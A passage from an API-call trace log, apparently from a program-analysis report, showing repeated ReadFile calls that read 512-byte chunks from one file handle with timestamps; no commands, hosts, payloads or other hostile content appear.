lpOverlapped=0x0) returned 1 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 
lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: 
lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, 
lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, 
lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile 
(in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 
[0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, 
lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 
lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: 
